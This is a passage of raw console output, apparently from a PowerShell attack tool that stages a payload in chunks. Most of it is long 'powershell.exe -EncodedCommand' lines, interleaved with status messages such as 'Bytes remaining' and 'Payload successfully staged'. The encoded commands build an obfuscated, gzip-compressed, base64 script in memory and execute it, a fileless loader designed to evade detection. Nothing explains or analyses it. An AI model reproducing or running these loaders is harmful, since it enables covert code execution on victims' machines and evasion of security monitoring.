MALwBoAEsAUAAvAGwAJwArACcAaQAvAHEAMABTAHoAMwA3AFkATwA0ADIAdwBjADEAYwBtAGUAdwBmAE0AMgBlAGEANQA4AFAANQB4ADYAZAArAHIAdgBtAEwALwBjADkAMABQAEgAdgBCAHYAeQB2AG4AcQAvACsAdAA2AEQAKwBuADUAdQArAFYANgBNAGoAOAB0AFAAVAArAFkARAArAGUAdQBmACsAcwBYAHgAKwBPAFkARgArADgAaABwADIAWABhAFMANgBrAHUALwB2AGIAdgBoAHQANgByAEYAaAA5ADAAWgArAEsAcgBwAE0ATQBXAHkAWAAvAFoATQAzAE0AZgA4AG4ATwAvAHYASAA5AGcAUABtAEYALwBWAHYAZgBMAEQAZgB2AG8AegBQAHUAUgBhAFoAcABqAHMAZABQADcAcwBSAG4AeABHADUAcgAvAHMAdABQAHoAdQArAE0AYwA3AEQAMgAzAGYANwArADgASQBzACsAcgBQAE0AMAB2AGMALwA5AHUAYQBaADMAWABzAE4ANgBKAHQAUAAvADEAbgBrAGQANQBXAGIAdgBlAFgAZgArAEgAdABKAGQASgBPAG4AbgB6AFAAcQBkADgAcwBkADQARgAnACsAJwB2ADIAMwB6ACsAZAB2ADcAbgBpAHMARABiADkANgB2ACsAMwBlAGgARgBQAGMANwB4ADcATgBNAHYAMAAvAE8AMABmAEUAdAA2AC8AOQByADYAbgA1AEgAWAAnACsAJwBYAGEATABOAE4ALwB5AE8AMwBPAGUANQB1AEkAdAAvACcAKwAnAE4AYwB1ADAAdQA5AHAAcgBkADUAcABuAGoAagA2AE8AZgBXACsAMgBIAHgAOQBqAE8AOQBGAC8AWAB2AEYAaABmAG0AMQBmAG0ANwBFAFAATgBGAGQAcABQADEAUwArAGoAMQBwADcANwBrAHsAMQB9AHYALwBoAGQAaQByAG4ATgA5AGEAaQA4AE0ANQBmAFYAKwB2AC8ARABQAGQAWQB4AGcAMQBxAGYAYgBQAEwAVABmAGIAZQAxAC8AJwArACcAcgA0AEQAVAA1AC8AKwA5AFkAOQBQAHgAZQBQAHUANABkAFAALwAvAEIAYwB1AHkAUgBwAFkAZwBSACcAKwAnADgAQQBBAEEAewAwAH0AewAwAH0AJwArACcAJwApAC0AZgAnAD0AJwAsACcAQwAnACwAJwBRACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None
[+]  - Bytes remaining: 6136
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQB7ADEAfQBPAGIAawBJAFcAawBDAHsAMQB9ADQAVwBZAFMAWABQAGIAUwBCAEsARgAvADgAcgBjAFAAQgBQAFIAQgAyAHAAegBhAHoAcQBpAEQAdwBrAFIAWABDAHkAUgBkAEgARgBUAGsAeABOAHoANABEAGEAdwBUAFMAMQB1AHkAUgBZAGsALwAnACsAJwBmAHAANQAzAHkAdABRADYAagBrAE4ATAB3AHsAMgB9AFEAUQBGAFUAdQBMADEAKwArAHIASAArAFYAZAAwADkAZgBIACsANwB2AGIAbgBkADMAUAAvADcAOQAyADIAKwBUADMAWQArAC8ALwBEAEYAZgBQAFgAeABkAHIAVwA5ADIAZgAvAC8AUQAwAHUALwA0AHkAKwBSAFQASwBoACsAdQA3AHoANwA4ADgAbQBGAGUARgB5AC8AUgBYAHMAUwB7ADIAfQBqAHAAZQA0AGUASQB4AGgAVgBYAHkAUAA5AGkAQwBHAGQAZABHAE4AZABoAFgAegBLAGsANgBpAE0ANAB7ADIAfQBaADEANwBLAE8AcQAxAHIAUAB5ADQAcgAnACsAJwAzAEwAcgBtAC8AcgBJAHQATwBkAEIAZAA2AFAANQA2AGkAMwBNAGMAbQBpAG8ALwBSADAAZgBNAG8AZgBrAGIAbgBQAHEAWgBKAC8ANwBjAGoAdABoAEcAdgBVAFoAWgA2AFgALwB0ADAAWgA2AHgAegBGAGIAMQBGAGoAJwArACcASwBOADQAagBIAEkAVwBxADYAcABvAHMAZQA2ADYASwBwADUANAB2AGsAegBGAE0AWABaAHQAVwBlAGYAaQBuAFAAVgBtADAAZQB2AEgATwBoAFcAbAByADMAVgB4AEcAOQAwAFUAJwArACcAcwA5AEIANwBzAGwAdgByAGYARwBaADkAMwBaADkARQA5AHoAUgBHAHEAWABqAHsAMgB9AC8AeQAzAHYAeQBZADcAcgBLAEgANQB3AHIALwA4ADcAVQBaADYAeQAvAHQAZgBvADMAYwBlAG0AaQBqAHIAYQBaAGMAeQBqAFcARwBEADMAQwBEAHYAeABKAHgAVQBwAHUAbABxADMASwBrADYAagA0AC8AdQBQADAAZQAzAEgAcAB6AHEAMAA3AGsAYgB4AEsAbAA3AGYALwBPADcATgBRAG4ASAA4AHsAMgB9AHQAMgBIADUAOQBkADgAcgAvAFcAMQBqACsASgB5AEgAcwBzAG8AeAB0AEYATwArAEYAMgB5AGoAcQA3AFAAeABHAFUAVgBzAHEATwA5ADEALwBNADQAeQAzAEcASQBvADIAagAzAFkANQBJAFUAZgA2ADAAdgBlACcAKwAnAHcAZgBFAGEAWgB2AHcAWAAvAEUASgByAGEALwA5AGQAaABHAE8AbAArAHgAbwA4AFoANgArAFAAeQBGAHYAbQA2AHEAWQBSAEMAZgB4AC8ARABtADYARgBmADgAZgBSAFcAOQB7ADEAfQB2AHUANgBpAHQANQBjAGYAcgBEACsASQB1AGYAMwBaAHgASQA2ADgAZABrAHYAaQBxAFgAagBMAHIANABoAFQANAByAGUAeABYADMAMwB5AE0AbwB4AHUAQwB6AHgAYwBFAHAAOQBGAHAAWAB3AG8ANwBwAHMARQBIAHMAcABZAFYAcwBXAGMAZABSAGQAMQB6AHAALwAyAFMAZABFAEoANQBiADMANABrADMAMwAwAGYATQB4ADYAdQB5AHIAagBZAGwAewAxAH0AcABIADQAcgBEAHMAcABKADkAdgBaAEoAOABmADgAegA3AHkASAAvAEYAZQA4ADMAMwAzAFoAcAA4ADcAcQBQAFQAeAB6AC8AbgBYADMAWgBjAFIAMgAnACsAJwA4AFQAVQAvAHgAWABQAHIAVAB1ACcAKwAnAEMAZQB1AE4AaQBSAHMANAB4AFgALwA4AHEALwBIAFgAZABtAG0ALwBFAHYAOQBmAHkATABmACcAKwAnAHcAOAAwAHoAYwAnACsAJwBkAHkARgA3ADkAZAAyAHkAVgByADYANwArADUAagBXAHgAYQAvAGsALwB6ADkASgBkAGEARAB2AFIAdABpAHQAZQBHADUAcQA0AGEAVQBYAGsAYwBpAGoAOABpAFIALwBuADQAbgAvAHEAcwBHAGwALwBIAHsAMgB9AEYALwA4AEwAYgBDAC8AYgBOAHEAKwBJAFAAdgBzAC8AcgA5AFYAbQB2AGgAVgAyAHIATwB1ADcAewAxAH0AMwBhAGMANgB4ADgATgA0AEUAeAA0AFAATwBEAEYAKwB5AHgAUQBEADgAbAB3AHUAbABCAGYAcQA2AEoAVAAxAHoAMgB3AC8AKwBDAHQAYgBNAFEAWQBQAGkAdQA4AE8ASABNAGkAKwBMAFgARQBVAHYAaQBiAEcANwA1ADUAOABDACcAKwAnADQALwAzAGsAYgBCAEwAOQB7ADIAfQBuAHYAZgAvAHIAOQBTAG4AVQBtACsAeQBjADEAZQBhADMAewAxAH0AMABYAGYAeQB1AGEAUwBlAGwASABmAGgATAA0AEUAUAArAFgAWABEADgANQAzADMAVgBkADUAUwB5AEsANQBIAC8AagAvAGkAZgBwAFMASQA4ADQAQgA2AHYAeQBVAE8AeQBwAC8AegBJAEYAeAA4AGIATwBvAHcAMQA2AFgAegBwADMAegB4AFgAdABuAFAAOQBoAEgAdgBTAHYASABzAGUAUAA4AGgAKwBaADgAWQB4AHcAdgAnACsAJwBaAFIAYgB6AFAAaQBjAHMAcABjAFoAcABVADgARgBFAGkAcgA4AGEAcAA0AHYAQwBGAGUATwA2AEkAZgAzAGMAUQAxADkANQAzAGsATwB1AHsAMgB9AHYASQBjAFAAQwB2AEsAawBlAG4AbwBpAFQAcwBwAC8AaQAzAHsAMgB9AE0AUQB2AEYAcwB7ADIAfQAzAGYAcQBkAHsAMQB9AFoAdQBUAHMARwA3AG4AcAArAFIAOQB3AGwAOABJAEoAdwBtADYAaQBYAHoAegBvADIALwA0ADcAbgBzAGwASgA4AFAAMQBJAFAAaQAvAFIAeQBkAEQAYgB4AHcAUgBMAHcAdgAzAC8ATQA1AEIAZABmAHkAMwAvAHcAeABKAEkALwBLAGQAMgBJAC8AWABhAGYAVQBkAFIAZQBjAEUAOQBkAEUAUABUACsAeQAzAHMAWgAxADYAWAAnACsAJwAyAGMAcgB4AG4AMQBLAEYAeQB2AEsAOQAxAHIALwArAFQAOAB0ADMASgA5AHkAUwAvADUAYgA5ADQANwA0AEUAWAA0AFAATwAnACsAJwBDAHIARAB3ADcAMABmAHsAMgB9AHYALwBkAHQAUQBCAGUAWQBMAEgAOQBOADIAMQArAGEAUQBHAE4AdwBQADIAWABZAE4AYgB2AFQAZQB1AFYAewAxAH0ALwBhAFoAMgBSAGUAaABpAGYAewAyAH0AeAB3AFIAUAA3AGYARgBqAFUATwBsAC8AeAAwAFgANwB0AFYAbQBIAHUAaQBGAHUAOABPAGsANQBlAGYANABXAHYAVQBSAGMAbgA0AGoARABFAHYANwB1AHUAVQA1AHYAMgBGAGQAeAArADkAcgBVADcAdwBuADUASABYAHEALwBHAGYARwB0AHkAWgA5ADQAWgB7ADIAfQA4ACsAcAA4AFIASgBlAEwAOABrAFgANAByAHIAbABIADcAVABxADUAcAAxAEYAdgBEADIAaABMAHsAMgB9AHAAcgBuADEAdwBlAHYAQgBmADkAVgB3ADMAZABUAHIARwBIAHUAOABuAE8AMQBiAFUAdgArAEkAMgBJAGgANgB5AFgAOQA5AGQATwBEADkAVgBjAGMALwA2AHcAeQByAHoAOQA0AHsAMQB9ADgAeQBjADQAaAA2ADQARwBMAEYATwA0AFQARwAvAE4AUABZAHYALwB2AFgARgBmAHsAMgB9AFUAZgBoAFMAUAA1AHMAYQBCADUAWABzAFUATgB6AGsALwA3AFgAcgBrAC8AegBJAEgAKwBGADEAMwAvAGoALwB6AEgAVQBJAFgAcwBUAFAAeQBzAE0AcAA2ADQAJwArACcAeQBwAFUAKwBWAHAAVwBxAHUAZQBaAE4AZQBNAGYAcQB2ADgAJwArACcAcgAxADAAMwA4AEMAWgAxAGMASQArADkAbgA4AEMAZAArAHMAJwArACcAWQBaACsAMgB5AEkAbAArADQAVABQAEsAZgB2ADEAKwBCAFUALwA0AC8AeAA4ADgATAAxAE4AUwBNAHYAcwB1AGMANwBPAEIAcgBXAEcAVAA4AEwAKwBFAEoAKwBEAFkAeQByAEIAYwAvAE4AaAB4AFAAMwBzAFEAQwBQACcAKwAnAHcAdgBNAE0AWABDAFcAZQB6AC8ARgBMADcAOAAvAG8AJwArACcAbgA3AHgAUAAvAG8AVQB2ADgAYwBzAFIAOABaACcAKwAnAHIAewAxAH0AewAxAH0AOABKAG4AbwBpACsAcAAzAHEAKwBjAHYANQBUADcAUwB0AGQANgA0AHsAMQB9AC8AagBzAEgAcQByAGkAKwAvAHcAMQBwAGEAOABpADEAZABVADcANgB2ADgAdgB2AEkAcQB1ADYALwBlACsAZgBHAFkAZQBLAGwATwBhAHYAWgBYAG4ANwA4AGoAWAArAEwANQBQADUAdQA2AHYALwBQAC8ATgBYADAAdAA2AE0AOQA3AHIAbQB2ADYAagAvAEMAMABwAEoANAA3ADEAewAyAH0AZABqADUANQBNACsASQA3AHgAdgBXAEYAYwA0AGMAWgAzADIAWgBwAG0AZgB0AGMAOABNADMARwBUAGQAYwBlAEQANwBPAFgAMQBaADkAWAByAGYANgBKAFUARgAvAGkAaABPAHgALwBDAFcANAAnACsAJwB2AGkAewAxAH0AUABRAFAAegBFAC8AVwByAHUAaABVAE8AaAByAGIAYgArAFAAMABFAGIANgB5AE0ASQAvAE8ANgA4AFMANgBlAGUASQBJADMARgAvAEIAcABDAFUAKwBqAGUAOAB7ADEAfQBUAGQAbQAvAHsAMgB9ADIAdwA3ADcAWABkACcAKwAnAEgAWABkAEIAJwArACcAWAAvAFgAUgB1AHYAJwArACcANABGAEQAOQBkAHsAMQB9AFAAZgB5AHIANABkADcAeQB0ACsAdQA1AHEAKwAwADYASQArADcAcAByADQAZABjAEMATAA3AEQAcgBGAFgAKwBWAHoAUQBEADAASgBaAHkAWAB4AFcASQBGAEwAMwBZAHMAUABqAG8AbQBqADgAcgB7ADIAfQB7ADIAfQBMAHoAdAAwAEYAKwAnACsAJwB1AHsAMgB9AHAANABTAGIASwAzAGgATAB1AEQAQgB1AHcASgBkADUATQB4AEgASAB7ADEAfQA2ADcAYwA1ADEAUgBuAEYALwBTAEYAegBEAHUATwAyAHkAZgB3AGMAJwArACcAMgBYACsAdQA4AGYAZgBRADEAeABhAFQAVgA4AC8ANABHAEIASgBQAFIANwAyAFgAYwBJAGIAVwB0AGUAOABMAGwAeQB0AFgARwBjAEwAKwB2AEMAeAA5AFkAYgB6AFcAZQBGAG4AaQAzAFgARgBXAHoALwB4AGMANABGAE8AeQBMAHIAegBLAC8AWgBJAFoAeAB4AFoAcAB6AGwAdgA5ADEAdwBYADQARgBQADkALwA3AEQAdgBNAGYAaABTAEgAWgAxAG0ASABaAGoAMQB6AGMAegA2ADAAMwAzADYAMQBMAHcAYgB1AFUANgBHADEARgBuAGIALwByAHkAUQByAHkAdQB2ADMANgBkAE8AcgA2ADEATAB5AEYAUABYACsALwA0AGsAcgAzAFAAMABiAGUANgBMAGwAKwBSAGIAdgBIAG0AZAA5ADgAMwA4AE4ASQBaAEgAZQB1ADQAdgA1AHQAMQB0AGsAbAAvAGsAbwA4AHAAOABMAFgALwBNAFQAOAByAHoATgAnACsAJwAvAGYAOQBPAHQAZQBWADgAVQBuAC8AbwAwACsAcgBmAHEAYgBVAFkAYwA4ADYAcAB7ADEAfQB2AGYAagB0AGgASAA5AGkAKwBzADEALwByAEUAcQBlAFoAKwB7ADIAfQBGACsASwBoAC8AVgBjAG0AMwByAE8AYwBiAFMAZQBVAFAAeABjAHgANAByAGYARgBQAHMAVQByAHcAbAA4ADMAYQBaAGYAbwBPAE4AcgA4AEQAQgB5AEgATgBEAEwAdQB1AGIAKwBUAG4AOQBRAGYAdAAvADAAUwBJAEsAdgBYAHMASAA1AEMAUAB5AFUANgBHAFQANgByAHUAMQA2AGEAWABqAC8AagB2AFcATgBKAC8AdwBuAGoAcgAxAEgANgB2AGkAZgA0AEcAWQBFADcAcABXAFAANQBYAHUAZQBEAG4AagA2AHsAMQB9AGIANABXADgARQBYAEcAOAB4AGYAegBiAEoAWABqAHQAMwBOAGYAcQB2AEIAagBoAHQAMwBLADEAdwBYADcAWABEAEkALwBIAE8AcQA4AEUAMwBsAHUAawBIADQAZQB7ADIAfQBPAE4ATwBhAHUAWQBCADkAYQB2AG0AWAByAHgALwB4AGIANABMADkANwBYAC8ANABhAHYAUABmADgAMwBmAG8AcwA1ADgAcwBVAFkASAA5AE8ARABSADQAcQB6AFIATAB6AC8AQgB4AGQAeAA5AHcAdQAvAHQANgBRADkAYgB6AHcAbQB6AFAAUABkAGsALwBUAEkAagBUAHAAawB2AEgAYQBlAFgAWABFAGYAawBFAHoAdgB7ADIAfQBDAC8AUwBHAC8ASgBVAGYAWABsADkAMQB2AFEATwB2AFgAQwB2AHEAeABQAGkAZABzAHQANgAwAGsAbgAzAFcANgBlAG8ARABCADMAKwBWAEQANgAxAHIAMwBsAHEAaABaAC8AVwBkADUANwBjAGMAdgB3AGYAMgBXAFYAbwB2AG0AaQAvAHUANABMAFYAdAB3ADYAdQBlAGgAOQBEAFoAQwBYADEAVwBTADAAOQBsADMASABqAE8AVQBMADEAdQBqAFYALwAwAGEATwBSADUAdwBQAFgAcgB2AEoANQA0AFQAdQBHADUANgBuAHgAdABYAFYAegAnACsAJwBDAGkAegBYAHIAYQA5ACsAUgBlAFEAegA5AGQAdQBHADgAWAA1AEsAMwBaAFcAUwBlAFgANQB0AGYAdwBTAFAANgBvAGsASgBQADMATwBiAG4AeABDAFcASQBvAC8AbAAnACsAJwAzAGwASABLAGYAbgBOAFMANQByADYANwBSAGoALwBKAHYANwBMAHEANwBKADQAOQBmAHEAZgBlAFoAYwBUAGwARABKAHoAMABRAGoAMgB2ADYAaQBOADcAYgBOAHYAVwBsAC8AVAB2AFcAQgBlAGEAbAAvAFIAdQBQAEsAaQA0AG4AUABNADkANQBiAHUAWQBSAHgAVwBPAEkAJwArACcAZgBzAHgAMQBjAGMATgAzAFYANQA2AEgAbgBaAGMARgB1AGkAbwAxAC8AaQBiAFgAYgBTAHYAUABPAGEANABYADQAUgAwAGQAbABOAHsAMQB9AHIAcAA3AG4AdgA1AGoAbQBzAE4AdAA5AFgANABrAHYANQBaAFQAMwBhAHQAYwA1AHgAZgAwAG0AMgBHADEAeQBEAFIALwBWAHQAZQBNAEoAegBHADMAagByAG8AMwBPAFAAYwAxADcAcABwADUANQAzAHoAUAB0AFgANgBDAE8AdABQADgATgBPADUAewAyAH0AdgB3AFUAYgBvAE8ANwArAHsAMQB9AEwANgA1AEQATwBJAE8AdABjAHIAYgB0AHkAWAAyAEkATwAxADMAdQA2AG4AOABNAFgAMQBHAFYAUwBYAGUAcgAvAGwAZgBzAEUAOAAyADIAZQAwAHkAZgBwACcAKwAnAGIAYgA0ADgAOAAvAHoAdAB1AFQAWQBSAG4ANQAvAEcAVgBVAGkALwAwAC8ALwBRAFEAZgBRAGgANgAxAGIAMABzAGUAcQByADYAMwBoAGUARQB4AGYAWgBkAGEAagB2AGUALwBLADQAWQBhADQAUQBMAHkAKwBaAGsAegBxAGUASQA2AHgAYgBsAHUAbQB0AHIAcAA3AGgANgBUAEgANQA3AHoASQBuAE4ALwB2AEQAcwAzAHAAUAAvAFAATwB0AHEAZAA5AFgAZABOAE0AVgA4AHkAagA0AHgARgA3AHQAcwA0ADQAYwBGAC8ATwBYAC8AQgB7ADIAfQAzADUAeABCACcAKwAnAC8ANgBVAGMAVABuAHEAKwBaAGEAMQBXAGYANgB7ADIAfQBQAEcAMABjAFQAcgBWAFQAbQArAFgAZABmAFQATABmAFUAMgBKADgALwBLAHgAMgBXAGQANQA3AHgARABIACcAKwAnADkAdABZACcAKwAnAEYAegBGADMAWgBsADIAWAArADgAWgA1ADEAaQBIAFkAYQBaADIAMQBvAGQANQBLADgATABDAEcAdAAzAE4ALwBzAGQANABkAG8AWQB1ADEANwBoAGEAZAAwAGYAWgAnACsAJwA1AHgAYgB1AGUAOQAzAGsASgBPAHMASAA0ACsAYwBaADEAeAAvADIAaAA3AHEAawB6ADgATgBIAHoALwBOAGYASwBlAGkANwAzACsAUQBIADYARQBIADEATwB2ADkAQgAxAHsAMQB9AHcANAA3ADcAJwArACcANwBwADUAWQB4ADEAMABEADcANQBTADEAcQBWADYAWAByAHAAdgBkAEYAbABuADUALwB7ADIAfQB6ADEAMwBMADEAKwBVAGoATAA4AFUATABmAG8AbAB2AFIAMAA1AHgAagB3AEMALwBDAG4AZgByAEYAaQBLAHYAbgBQAGQAWABoAHoAdgAzAG0AWABhACsAcwBtAC8ATwBKAE0AZgBwAGQALwBVAEIANAArAFcASgBkADAAOABSAHgAaAB0ADYARABYAHcATgA5AHUATQBrADYAcQArAE4AMQA3AHIAaABlAG8AaQB2AFIAUgA0ADcAegBqAEgAbQBtAGYAdQB1AGYANgBHAHoANABIADkAMABCAHYAdABHAEQAOABFADcAUABmAGQAYgAxAE0AcQBKAGUARAAzAEYAVABQAEoATAA3AFkAbwBDAFQASAA4AHkALwBhACsASwBmADUANQB7ADIAfQBhAC8AaABsADUAegBoAGgAJwArACcAUQBoACsAOQA5AHEANwBSAE8AKwArAEcANAB3AHsAMQB9ACsAOQBSAGMANABqADUAegBQAHcAQgBuAE8ALwB6ACcAKwAnADcAbgAyADUATwAwAEcATwB4AGYAcwAyADAAbAA1AEQAcgB1AHcARABoAHoAbAAnACsAJwBPAGwARQA4AEYAWQBlAGwANQA5AC8AcQBMAFMAOQBEADQAMgBPAEIALwB0AHoAegAzAHIAegAnACsAJwBPAC8AVwA1AFoAWgBWADIAMgBSAFMAKwBWAFAAbwBkADUAeQBYADAAYwB2AFoAMwB7ADEAJwArACcAfQBhAGMAdAA4AFIAMwA5AFQAdgBzAHcAcgBXAFUAOQA5AHkAZgBsAGsAUABqAHMAbgBUAHAANQByAHQAcAB3ADcAYwBXADcAQgAvAE4AQgBwADUAdABVAGUAYwA2AGgANABRAGYAYQBQAG0ATgA4ADUAVAAzAHIASAA0AHkAMwA2AFUARAB6ADcAKwBoAGIASABOAG4AbwBuADgANABOADEAUwBqADcAZgBNAGYANQBXADkARwBuAE8AVABkAEMARABQAGMAOAA3AFIAKwBUAEgANQA0AFAAWgBIADUAKwAvAHUAUAA1AEsAbgB3AGUAOQB7ADIAfQB7ADEAfQBmAHAAcQAwAGYAMwBUADgAOQBuAG4ASwBlAEUAZABlADIAbQB5AHUAYwBuADEAcQBsAHQAegAxAE4AUAA4AEwALwB5ADYAdgBNAHsAMQB9ADIAZAAwADMAMwBzAEYAZgAyAC8AcgBhADUAMgAwAGoANQBoADMAbQBNAHAAOQAzADIASgA1AGoAbgAyAC8ANQBuAEcAawB7ADEAfQBqAG8ANwA0AGIAewAyAH0AUgBmADUAUABQAEwAcAB5AGEAdQBOAFgARgBiADAAYwBlAEUAOAA2AGwAMQBXADAAVgBlAEYALwB7ADIAfQAzAHMAYwA0ADAAdgA3AGoATwAzAEQAZQB0AFEALwBRAGUAZQBEAFEATwBOADEAawAvAGMAawA2AFYATQBqADYAeQB2AG4ANQBzAHoAcgBjAFcAbQBiAGQATAA4ACsAbgBuAGYASwA0AFYAbgBxAHMAWAA5AEgALwA0AG0ASABPAFcAUABJADkANgBiAGwAQwBmAG0AcgB0AHYAUgBqADQAWABtAE8AQgAzADIAZgBCAGoAeAAvAFAATgBHAGUAYwBuAG8ANQBUAFAAawBkAGIAdwBpACsASwBUAHEAcQB4AEgAVgBIADgAUAAyAEQAMQB2AHoAaABzADkAegA3AGMAZABCADgALwBCACsAYgB5AGoAbQBXAC8AJwArACcAZgA4AHIAegBQAGMAeQBCADkATgBHAFgALwByAEYATwBaAGoAegB4AG4AegB2AEkANQBRAGUAbgA0AHYAeABDAG4AbgBYAFYAawBuADcAaABlAE4ALwAwADEAOQAyAFAATwAyAFkAUwBIAHsAMQB9ADkANwBYACsASgBIAGoALwAvAEsAdQBEAHkAUAB6AGkAZQBmAGsAdwB2AHIAMQA4AFAANABxAG0AcgBtAFYAdQBTAGkAZgBoAC8AcgA4AGMASQB5AGUARQBlADQAdgByAGMATQBlAHcAYQBIADEAYQBlAEkAOABxAEQAVABQADEAUABDAE0AMQB2AGsAZQBGADYAMwBjAEIAOQBxACsAZgAyAFQAZABaAEYANgBvADYAUQBzADkAKwA1ADEANABiADgALwAxAE0AVABxAFAAOABPAGkAWgA1ADEAZgB5AEoAYgA2ADQAbwBvACsAagBwADYAcQBpAFQAYgB6AFgANQBvADAAKwBkAHIAMAAyADUAMgBkAFAAMgBQAFAALwBuAGsAOQA5AHQAVAA3AGIAUgBsAHQANABkAFoAKwBZAEUAYQA4AG4AOQBqAEYAUABVAHcALwAnACsAJwB3AFQATABaAEgAZABwADAAUwA1AHgAdAB3AG4ATQAvAHQAegB2AE4AOABwAEgAVQB1ADQAMgB7ADEAfQAzAHoAdwBmAEUAUwAvAEUATgAvAEwAbwBGAGgAeQB2AHEAcgAvAFEANQA5AGgAewAxAH0AZQBrAGYAKwAvAFIAdgB6ACsAKwA0AGQAZgAvAHYAJwArACcAWgBoADkAcgBoADcAKwBQAEMAUAAvAHcATABZAHEAUABCAHkATwBSAHsAMgB9AHsAMQB9AHsAMQB9AHsAMQB9AHsAMAB9AHsAMAB9ACcAKQAtAGYAJwA9ACcALAAnAEEAJwAsACcAZwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None
[+] Payload successfully staged.
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA=
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAf